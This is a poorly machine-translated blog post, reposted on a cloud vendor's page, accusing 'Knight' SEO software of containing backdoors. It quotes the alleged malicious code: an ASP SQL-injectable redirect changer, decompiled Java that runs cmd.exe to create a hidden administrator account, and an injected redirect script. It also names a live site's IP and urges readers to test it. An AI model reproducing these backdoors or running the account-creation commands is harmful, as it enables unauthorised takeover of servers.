Warrior, can you say you're innocent?

Source: Internet
Author: User

Intermediary transaction http://www.aliyun.com/zixun/aggregation/6858.html ">seo diagnose Taobao guest cloud host technology Hall

Recently saw webmaster online a denunciation of the Knight Software article, estimated regardless of the article's right and wrong, I just want to from another angle to analyze the character of the Knight's author.
Knight 1.0 steals from search enemy
The reason is as follows: A little can read the ASP code, you can see the source of the search for the release of the program back door exists, the beginning of the code is as follows:

If Request ("Hm") <>0 Then


set Rs=server.createobject ("Adodb.recordset")


sql = "SELECT * from A where aid=" &request ("Hm")


Rs.Open sql,conn,1,3


rs ("tzurl") = Request ("Tzurl")


Response.Write "<script Language=javascript>alert" Operation success! Javascript:history.go ( -1);</script> "


rs.update


Rs.close


Response.End


End IF


meaning that as long as HM parameter is not 0 can be forced to modify the program jump address!


The same back door exists in the 1.0 version of the knight, interested friends can test themselves! Below is I found a Knight 1.0 station, offend this webmaster also please forgive! (http://61.157.109.6/)


Two, the Knight 2.0 to 4.5 all have the back door existence


in the latest release of version 4.5, using JSP writing, simple decompile software code, you can see such a section:


if (!) Cmd ". Equals (_$29.getattribute (" Cmdshell "))


break missing_block_label_2159;


AS2 = new String[3];


AS2;


as2[0] = "cmd.exe";


AS2;


JVM INSTR swap;


1;


"/C";


JVM INSTR Aastore;


JVM INSTR DUP;


JVM INSTR swap;


2;


"NET user AAA langh123!@# add";


JVM INSTR Aastore;


String as[];


as;


String as3[] = new STRING[3];


AS3;


as3[0] = "cmd.exe";


AS3;


JVM INSTR swap;


1;


"/C";


JVM INSTR Aastore;


JVM INSTR DUP;


JVM INSTR swap;


2;


"net localgroup Administrators Aaa/add";


JVM INSTR Aastore;


String as1[];


AS1;


runtime.getruntime (). exec (AS);


runtime.getruntime (). exec (AS1);





In addition in this new 4. 5 version of the software I also found a user's website to add code on the back door, the backdoor address for


Http://www.vnetpush.cn/push.asp?id=cpuid


in a user's web page I found in the loaded JS file content:


Document.writeln ("<script language=\" javascript\ ">");


Document.writeln ("self.location=\" Http:\/\/www-md5sdfs1df26x6s.sexaiai.com/dnschang_ 4b8ffe4e009a8c703f9590e694d5219f\ '; ');


Document.writeln ("<\/script>");





jump to a GG advertising station! Interested friends can go to track down ...





software is good or bad for the moment, just from the above two points can be seen the character of the chivalrous author has a problem! Warrior, do you dare to say that you are innocent?

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.